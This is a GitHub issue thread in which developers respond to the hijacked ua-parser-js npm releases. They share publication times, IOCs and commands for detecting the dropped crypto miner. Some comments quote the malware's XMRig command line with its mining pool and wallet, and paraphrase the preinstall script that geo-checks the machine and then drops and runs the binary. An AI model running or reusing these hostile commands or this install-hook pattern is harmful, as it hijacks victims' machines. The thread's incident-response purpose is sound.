Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) - Questions about deprecated npm package ua-parser-js

[SuperOleg39]

Hi!

See a warning at npm - https://www.npmjs.com/package/ua-parser-js - This package has been hijacked. Please revert to 0.7.28

First question - Can we use range ^0.7.28, or it is not safe?

Second question - Will you create a new package, or try to remove hijacked versions and continue update this package?

[DanielRuf]

@faisalman did you enforce 2FA for your npm account and for releases there too?

If not, please do so. I also think this library, which is used by many, should be in an org account on GitHub, not a personal one.

The current truck factor is probably quite low and there should be more than one maintainer. If you need help with the migration to an org, I can help.

[Marenthyu]

Does anybody still know when the malicious versions were released exactly? This would help to check whether anyone ran an npm install that fetched the malicious version during that time. Thanks for the help.

It was quite well summarized by @mensfeld above: https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-949936808

TL;DR: The first compromised version was released at Oct 22 21 14:15 CET , with the first fixed version being released at Oct 22 21 18:16 CET

[gugu]

does someone have malware linux binary? I want to disassemble it to understand what can it do

[jackadamson]

does someone have malware linux binary? I want to disassemble it to understand what can it do

I don't have a copy, but the CLI arguments that are passed seem to match those given to the XMRig monero coin miner.

./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u 49ay9Aq2r3diJtEk3eeKKm7pc5R39AKnbYJZVqAd1UUmew6ZPX1ndfXQCT16v4trWp4erPyXtUQZTHGjbLXWQdBqLMxxYKH --cpu-max-threads-hint=50 --donate-level=1 --background &>/dev/null &

Source: https://xmrig.com/docs/miner/command-line-options

[gugu]

This script does not work for Ukraine, Russia, Belarus, Kazakhstan. Usually it means it is someone from our countries

[DanielRuf]

@gugu maybe you can analyze it with hybrid-analysis.com which has also Ubuntu / Linux VMs

[gugu]

I don't have a copy, but the CLI arguments that are passed seem to match those given to the XMRig monero coin miner.

We can not be sure as it can bundle another script

@gugu maybe you can analyze it with hybrid-analysis.com which has also Ubuntu / Linux VMs

We need to get the file, currently it is unavailable. If we can get at least checksum of it we can be sure it is only monero miner

[broofa]

@faisalman Please publish a post-mortem (once the dust has settled) that outlines what happened and what you could have done differently to prevent this, so we can learn from this experience.

[DanielRuf]

@gugu hm, seems the URLs are generally down for everyone. I've checked all other malware databases and did not find a sample for this URL (for the Linux version).

https://my.diffend.io/npm/ua-parser-js/0.7.28/0.7.29#d2h-656491

I'll ask if someone from Sonatype has any IOCs including hashes or samples.

[jabali2004]

@gugu I had the binary installed yesterday. I could see if I can find it in my pnpm store.

[ConfusedAlex]

Linux noob here. Yesterday I installed the npn and I think I am affected by the malware. Is there any way to check if I am affected and is there a way to get rid of the virus_

[gugu]

Is there any way to check if I am affected and is there a way to get rid of the virus

pgrep jsextension

it will show if the program is running now

[jabali2004]

Nope no linux binary left on my development vm....,

[AleksandrHovhannisyan]

I noticed that the PID of jsextension keeps changing. Anybody know how to figure out what parent process launched it? I'm unable to kill it.

[kelset]

Hey folks - thanks for all the collective work in trying to get this sorted!

@faisalman one piece of feedback, before everything else: can you edit the first post (the top message) with some more clear information about this problem? It would help everyone who lands here to get a better understanding of the situation.

---

Now, can I ask you all for help? I'm really not great at CLI across OSs and node package managers - could you help me out in finding the right commands per each system and per each package manager to find/verify if someone had installed the affected version and/or which version of ua-parser-js they might have installed on their machine?

I would imagine that each package manager has a global cache of sort where it keeps a local copy or at least a reference of every package ever installed? (or maybe I'm naive? 😅)

here's a handy markdown table to fill:

| OS      | npm command | yarn command | pnpm command | other package manager |
| ------- | :---------: | -----------: | -----------: | --------------------: |
| Windows |  <add me>   |     <add me> |     <add me> |              <add me> |
| Linux   |  <add me>   |     <add me> |     <add me> |              <add me> |
| macOS   |  <add me>   |     <add me> |     <add me> |              <add me> |

Aside from this, I seem to understand that there's also a command you can run to see if the malware is currently running, am I right @tjhorner (sorry for mentioning you, your comment is very good and detailed so I'm betting you have knowledge in this >) )? Could anyone post those too?

---

small edit: For yarn:

yarn cache list --pattern ua-parser-js

[ahmetbicer]

@AleksandrHovhannisyan if you are checking with ps -aux | grep jsextension the process that shows up is the grep itself. You can check with pgrep jsextension to see if any PID returns.

[andrei-bacs]

@AleksandrHovhannisyan you can use pstree On Linux or tasklist in Windows. Do you happen to have the Linux binary? If so can you please share an MD5 or SHA256 of it?

[gugu]

I noticed that the PID of jsextension keeps changing. Anybody know how to figure out what parent process launched it? I'm unable to kill it.

does kill -9 help? After you stop it don't remove please, we need checksum of it to make sure it is only miner and does not steal data

[AleksandrHovhannisyan]

@ahmetbicer Ah, okay, pgrep jsextension doesn't show anything. ps -aux | grep jsextension shows this, and I was panicking thinking it's the miner:

aleks     6781  0.0  0.0  14812  1192 tty2     S    12:55   0:00 grep --color=auto jsextension

Apparently I don't know what I'm doing, lol 😅 Apologies for the confusion!

[andrei-bacs]

@kelset MacOS is not affected. The preinstall.js script skips this platform (i.e. does not download a binary on it) and the preinstall.sh script also skips all Linux machines that are located in: Russia, Ukraine, Belarus, Kazakhstan.

You can notice these lines in the preinstall.sh script:

IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU|UA|BY|KZ') if [ -z "$IP" ] ... drops the binary here and starts it ... fi

[DanielRuf]

Sonatype and Bleepingcomputer analysed the samples:

https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/

Turns out the hijacked ua-parser-js NPM package not only mines cryptocurrency on Windows, Linux machines but the dropped DLL also steals passwords for FTP clients, VNC, messaging apps, email clients, browsers, and many apps. "From copies of the malicious NPMs shared with BleepingComputer by Sonatype, we can better understand the attack."

So the dll file is actually a password stealer. The jsextension file is probably just the original miner.

The article contains a list of targeted applications and shows code, which accesses the credential manager of Windows.

[scottaw66]

@faisalman Have you been able to get npm to take steps wrt your npm account security? Any idea how they got in in the first place?

[nathanawmk]

How did this happen? A post mortem is sorely needed. We need to avoid this from occuring again. Believe that the active use of npm audit and/or synk and/or palo alto prisma cloud / the update framework (tuf) /sonatype would have deterred this from happening in the first place?

[channa-med]

When were these compromised versions added? I can't find the history since they have been removed.

[gugu]

How did this happen? A post mortem is sorely needed. We need to avoid this from occuring again. Believe that the active use of npm audit and/or synk and/or palo alto prisma cloud / the update framework (tuf) would have deterred this from happening in the first place?

Using random security-related programs does not always help with security. I think author have already enabled 2FA, it prevents things like this from happening in future

I want to say thanks to the author for maintaining this module and solving the problem in a short period of time. Everyone's computer can he hacked. Especially if a person thinks otherwise

[ljharb]

try npm show ua-parser-js time

[PrivateGER]

How did this happen? A post mortem is sorely needed. We need to avoid this from occuring again. Believe that the active use of npm audit and/or synk and/or palo alto prisma cloud / the update framework (tuf) would have deterred this from happening in the first place?

npm audit does absolutely nothing to prevent security issues, it only displays security advisories already published. The only way to defend against this would be an antivirus on either your or npm's side.

[tanelikaivola]

When were the affected versions published? Now that they've been pulled, neither npm or github have any infromation about them at all.

[ljharb]

@tanelikaivola absolutely npm does, see https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-950202924

[igor-sysoev]

How can I check on windows whether or not my system had been compromised? I noticed my laptop started getting quite hot a couple of days ago.

[DanielRuf]

How can I check on windows whether or not my system had been compromised? I noticed my laptop started getting quite hot a couple of days ago.

The affected version was published on the 22nd of Ocotber (Friday) and removed a few hours later on the same day.

[igor-sysoev]

How can I check on windows whether or not my system had been compromised? I noticed my laptop started getting quite hot a couple of days ago.

The affected version was published on the 22nd of Ocotber (Friday) and removed a few hours later on the same day.

Right. I stupidly had my Windows Defender off and I started having performance issues right about that time. Windows Defender scan doesnt show anything anymore, but I don't really know how to proceed besides the usual password change and stuff. Any advice on how to restore my potentionally compromised PC back to normal?

[DanielRuf]

I think author have already enabled 2FA, it prevents things like this from happening in future

There are two settings at npmjs. One 2FA setting for the account itself and one 2FA setting for publishing packages (which is not enforced by default afaik) - per package.

See this:

So normally you can publish a package with a stolen token afaik.

[y4my4my4m]

Is this only dangerous when installed globally? I have hundreds of projects with local packages installed, not sure how I'd scan through them all easily...

(i understand this only happened a few days ago so only recently updated ones should be a concern...but still...)

[DanielRuf]

Is this only dangerous when installed globally?

No, it makes no difference if locally or globally installed - it is the same computer. Unless you have used npm i --ignore-scripts.

[DanielRuf]

Is this only dangerous when installed globally?

Generally there was just a small window on Friday (22nd of October) when the malicious versions were released and only Linux and Windows seem to be targeted. If you installed before this date, then you are problably safe. Same for MacOS. See also the previous comments and the diff links.

[ljharb]

@DanielRuf https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-950181260 says Macs aren't affected.

[tanelikaivola]

Thanks @ljharb!

Here's the information so it's more easily available.

So the packages were available maximum of about 4 hours? (possibly even less?)

'0.7.29': '2021-10-22T12:15:21.378Z',
'0.7.30': '2021-10-22T16:16:08.807Z',

'0.8.0': '2021-10-22T12:16:06.877Z',
'0.8.1': '2021-10-22T16:23:53.062Z',

'1.0.0': '2021-10-22T12:16:19.726Z',
'1.0.1': '2021-10-22T16:26:19.004Z',

[DanielRuf]

@DanielRuf #536 (comment) says Macs aren't affected.

That's what I wrote, MacOS is not affected ;-) I wanted to write "Windows" but wrote "MacOS" by accident.

[ghost]

Am I affected if I had installed a package that used this library from pnpm? (in WSL2)

[RandomYser]

Is there a way to know all packages dependent on these specific versions? There are 1200 odd dependents marked in npm but that's for all versions, I think.

[nathanawmk]

How did this happen? A post mortem is sorely needed. We need to avoid this from occuring again. Believe that the active use of npm audit and/or synk and/or palo alto prisma cloud / the update framework (tuf) would have deterred this from happening in the first place?

Using random security-related programs does not always help with security. I think author have already enabled 2FA, it prevents things like this from happening in future

I want to say thanks to the author for maintaining this module and solving the problem in a short period of time. Everyone's computer can he hacked. Especially if a person thinks otherwise

Agreed. This can happen to anyone, including myself

[nathanawmk]

How did this happen? A post mortem is sorely needed. We need to avoid this from occuring again. Believe that the active use of npm audit and/or synk and/or palo alto prisma cloud / the update framework (tuf) would have deterred this from happening in the first place?

Using random security-related programs does not always help with security. I think author have already enabled 2FA, it prevents things like this from happening in future

I want to say thanks to the author for maintaining this module and solving the problem in a short period of time. Everyone's computer can he hacked. Especially if a person thinks otherwise

Sure 2FA is an absolute requirement and EDR for every developers. Are there any futher guardrails that npm or github can institute so similar incidents can be prevented?

[tanelikaivola]

Is there a way to know all packages dependent on these specific versions? There are 1200 odd dependents marked in npm but that's for all versions, I think.

@RandomYser, Is there even a way to list every one of those ~1200 dependents? You can get about 395 of those, but after that npmjs doesn't let you. More specificly, npmjs, ?offset=360 is the maximum, here npmjs, last available page

[RandomYser]

Is there a way to know all packages dependent on these specific versions? There are 1200 odd dependents marked in npm but that's for all versions, I think.

@RandomYser, Is there even a way to list every one of those ~1200 dependents? You can get about 395 of those, but after that npmjs doesn't let you. More specificly, npmjs, ?offset=360 is the maximum, here npmjs, last available page

Searching interwebs littlebit, this might help https://www.npmjs.com/package/package-dependents

[DanielRuf]

Sure 2FA is an absolute requirement and EDR for every developers. Are there any futher guardrails that npm or github can institute so similar incidents can be prevented?

@nathanawmk yes, npm i --ignore-scripts which should be the default imho, cc @ljharb

Same for 2FA requirement for releases. See my last comments and the screenshot.

This and other cases are good reasons why I use GitHub Codespaces now and removed all dev related setups from my laptops.

[DanielRuf]

@sharedrory you can search through the installed packages.

Also the problematic versions were only available for about 4 hours: https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-950222787

[raxhvl]

Overview

The attacker tampered with the installation script so that the package would automatically execute what appears to be a crypto miner during installation.

MacOS

MacOS users seem to be not affected as the script just skips this OS.

Linux

On linux it runs the following script

Indicator of compromise(IOC) for linux users:

• If you are from the following countries : Russia, Ukraine, Belarus, Kazakhstan, the malware does not install on your computer.
• Use pgrep jsextension to see if the malware is running
• Even if it is not running use sudo find / -name jsextension to see if the malware was ever downloaded on your computer.
• If you find any trace of the file jsextension please share the SHA checksum of the file with the community, you can use sha1sum jsextension to get the checksum

[Anon-Exploiter]

Shitty one-liner to detect it system-wide as a string:

find / -name "package-lock.json" -exec grep --color -EHni "ua-parser-js" {} \; 2>/dev/null

To detect if the vulnerable version is in your system:

find / -name "package-lock.json" -exec grep --color -EHni "ua-parser-js-(0.7.29|0.8.0|1.0.0)" {} \; 2>/dev/null

[rostockahoi]

It seems that version 0.7.29 vanished and there is a 0.7.30. Is it safe to update from "ua-parser-js": "^0.7.28" now?